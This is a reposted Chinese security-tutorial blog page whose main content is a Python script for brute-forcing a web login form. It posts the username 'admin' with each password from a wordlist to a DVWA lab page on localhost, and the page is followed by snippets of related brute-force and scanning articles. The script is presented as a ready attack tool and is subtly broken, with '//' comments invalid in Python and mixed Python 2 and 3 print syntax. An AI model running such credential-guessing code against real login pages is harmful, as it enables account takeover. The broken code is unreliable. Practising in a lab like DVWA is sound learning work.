从零开始学安全(三十六)●利用python 爆破form表单

最新推荐文章于 2023-12-08 11:52:55 发布
最新推荐文章于 2023-12-08 11:52:55 发布
阅读量109 收藏
点赞数
原文链接:http://www.cnblogs.com/feizianquan/p/10595386.html
版权 
import sys
import requests
from requests.auth import HTTPBasicAuth



def Brute_Force_Web(postData):
    res = requests.post('http://127.0.0.1/vulnerabilities/burtforce/bf_form.php', data=postData) //使用requests库进行post发包
    if "success" in res.text: //检查网页返回包中是否包含success
        print ("="*20 + "\n" + "Crack Sucess!")
        print ("Password is:" + passwd) //若网页返回包中包含success,输出正确的密码
        exit()
    else:
        print "Test password:",passwd,"is wrong"


def GetPass():
    fp = open("password.txt", "r") //读取密码字典
    if fp == 0:
        print ("open file error!")
        return
    while 1:
        line = fp.readline() //读取密码字典一行
        if not line:
            break
        global passwd
        passwd = line.strip('\n')
        postData = {
            'username': 'admin',
            'password': passwd,
            'submit': 'Login'
        } //构造post数据包中的各参数与值
        Brute_Force_Web(postData)


GetPass()

 

转载于:https://www.cnblogs.com/feizianquan/p/10595386.html

weixin_30835923
关注
[网络安全篇] 三十八.hack the box渗透之BurpSuite和Hydra密码爆破Python加密Post请求(二)
杨秀璋的专栏
01-13 1万+
这是作者的系列网络安全教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们习,希望您们喜欢,一起进步。前文详细讲解了hack the box在线渗透平台获取邀请码、注册过程。本文将分享Web渗透三道入门题目,它们包括Python编写md5加密发送Post、万能密码和URL路径猜测、BurpSuite和Hydra密码爆破等。基础性文章,希望对您有所帮助!
Hydra(九头蛇)弱口令
墨痕诉清风的博客
01-11 9145
一个非常快速的网络登录破解程序,支持许多不同的服务。查看功能集和服务覆盖页面-包括与ncrack和medusa的速度比较 当前版本:8.6最后更新2017-07-21(c)vanHauser/THC的2001-2017@thc.org;许多模块都是由David(dot)Maciejak @ gmail(dot)com编写的BFG代码由Jan Dlabal提供在AGPLv3下许可(见LICENSE文件)请不要在军事或秘密服务机构使用,或为非法目的。
python 实现简单爆破form表单
weixin_33751566的博客
01-03 214
import httplib,urllibimport stringdef rf(): fp=open('1.txt','r') for i in fp: fp1=open('1.txt','r') for j in fp1: if(conn1(i.rstrip(),j.rstrip())): ...
使用 python 的httplib模块爆破 form 表单的简易脚本
weixin_33826609的博客
05-10 106
httplib: 包含了 httplib爆破 web 的 form 表单的使用方法 httplib 中代理的添加方法 # -*- coding: utf-8 -*- import urllib import httplib import re headers = {"User-Agent": "Mozilla/5.0 (Macint...
使用 python 的request模块爆破 form 表单的简易脚本
weixin_34236497的博客
05-11 393
python 的 http 中 request模块在web 表单爆破的使用方法 request模块中代理的使用方式 request 模块是http 中比较全的模块,简单易用,比之前文章中使用的 httplib,urllib,urllib2都要好用.可以替换为request 的 session 方法. # -*- coding: utf...
python网页提交表单_python提交表单
weixin_39670545的博客
11-20 754
广告关闭腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元!识别语言: 输出语言: submit 从代码中可以看出,表单中需要提交的键值对有三对{action:doc},{ocrlang:2},{keylang:0},表单会提交到http:xxx.xxx.comxxx.php,所以对应的爬虫的python代码如下:# -*- coding:u...
nmap常用命令与进阶教程
weixin_44912169的博客
04-22 952
nmap常用命令 nmap是探查计算机网络和服务的安全扫描工具,是枚举和测试网络的强大工具,结合他丰富的NSE(nmap script engine)脚本使他变得不再普通 基本参数 用法: nmap [Scan Type(s)] [Options] {target specification} -p 扫描指定端口 -sS 使用SYN半开扫描 -sn 使用ping扫描,用于主机发现 -Pn...
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1256
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
红队系列-SRC常用漏洞挖掘技巧
最新发布
aming小老弟
12-08 1485
安全弱点sql 注入命令 注入深入利用xpath注入 (老式 ) 广泛了解乌云镜像薅羊毛。
WEB...2
zejiiii的博客
02-09 302
WEB2 文件包含 将任何的php⽂件或者⾮php⽂件利⽤函数包含进php⽂件之后都会被当作php代码解析 PHP提供⼀些函数来进⾏各个⽂件之间的相互引⽤,并提供了⼀些协议⽤于读取或者写⼊⽂件 特殊文件包含: include(' flag.php ') 包含 flag.php ⽂件 其他函数:include、require、include_once、require_once、 highlight_file、show_source、file_get_contents、fopen、fi
Login-Form-BruteForce:使用Python3强制执行简单的HTTP登录形式
03-04
简单的HTTP登录表单BruteForce 使用0xhawwk用Python3强制执行简单的HTTP登录形式 替换BurpSuite的python脚本:) 所需模块:可以使用pip或pip3进行安装: 时间 系统 操作系统 要求 通过python3 PythSuite.py运行此脚本 运行此脚本 首先将提示您输入HTTP-post-login-form的URL。 您应该从“ Inspect Element的“ Network Tab复制URL 。 对于例如http://10.10.10.10/login 然后,它会提示您是否要选择用户名单词列表。 如果要添加单词列表,请键入y 。 然后添加单词表的位置。 例如/usr/share/wordlists/username.txt 。 如果要输入一个用户名。 键入n ,然后在下一个问题中键入用户名。 然后,它会提示您是否要选择密码单词列表
网络渗透测试实验一 网络扫描与网络侦察
weixin_62571616的博客
11-26 416
网络扫描与网络侦察
Nmap中一些常用的NSE脚本
TENCENTSYS的博客
08-24 1014
Nmap 一款标志性的跨平台扫描器。它的原意为Network Mapper(网络映射器),具有相当强大的扫描功能,几乎适用于任何渗透场景。不少人甚至认为它就是全球最好的扫描软件。除了常规的网络扫描,Nmap还可根据NSE (Nmap scripting Engine)的脚本进行大量渗透工作,这种脚本是基于Lua编程语言,有点像javascript。正是NSE,使得Nmap不再普通。 首先,我们扫描...
网络渗透测试习一之网络扫描与网络侦察
Force~
11-01 2633
文章目录前言系统环境网络环境实验工具实验原理1、网络扫描与网络侦察的目的2、Google Hacking(或baidu)3、BASE64编码4、Namp5、WinHex二、实验步骤1.用搜索引擎Google或百度搜索麻省理工院网站中文件名包含“network security”的pdf文档,截图搜索得到的页面2.照片中的女生在哪里旅行?截图搜索到的地址信息。3、手机位置定位4、编码解码5、地址信息6、NMAP使用7、利用ZoomEye搜索一个西门子公司工控设备,并描述其可能存在的安全问题。8、Winhex
form标签的action之前 加密_口令爆破之突破前端JS加密
weixin_39782573的博客
11-20 305
0x00 前言近期安全测试时发现一个系统前台使用了SSO,但是在比较隐蔽API中发现了后台的登录接口,该接口未使用SSO,同时没有图形验证码等校验,通过分析最终爆破进入后台。0x01 确认攻击途径通过信息搜集找到后台登录URL,由于URL比较敏感,这里以 admin/login替代,尝试登录发现没有图形验证码等校验通过BurpSuite抓包发现密码字段被加密了根据回显不同,可进行口令爆破...
实验一
m0_51393409的博客
11-05 1981
网络扫描与网络侦查 实验目的:理解网络扫描、网络侦察的作用;通过搭建网络渗透测试平台,了解并熟悉常用搜索引擎、扫描工具的应用,通过信息收集为下一步渗透工作打下基础。 1.用 ...
python 写的http后台弱口令爆破工具
byteway的专栏
12-12 6277
利用python 写的多线程爆破后台用户名+密码(自备字典),比较实用,即使是在信息安全这么重视的今天,还是有人不加验证码或者异常访问限制之类的登陆验证方式,这样就很容易被弱口令爆破工具拿下,(本代码仅限习实用,禁止进行web攻击,不承担法律责任)
DVWA之Brute Force(暴力破解)
热门推荐
谢公子的博客
10-04 1万+
目录 Low Medium High Impossible 暴力破解是指使用穷举法,举出所有的可能的结果,然后逐一验证是否正确! Low 源代码: <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password ...
pikachu——基于表单的暴力破解python解法
记录并分享学习安全的知识点..
01-17 423
代码如下: import re import requests with open('user.txt','r') as user: for username in user: #print (username.strip()) with open('password.txt','r') as passwd: for password in passwd: #print (password.strip()).
Python编程入门:从零开始Python(第二版)
"《从零开始 Python》(第二版) 是一本全面介绍 Python 编程语言的书籍,由 Guido van Rossum 发明,1991 年首次公开发行。书中强调 Python 的简洁清晰语法和强大的类库,被誉为‘胶水语言’,能方便地结合其他语言...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值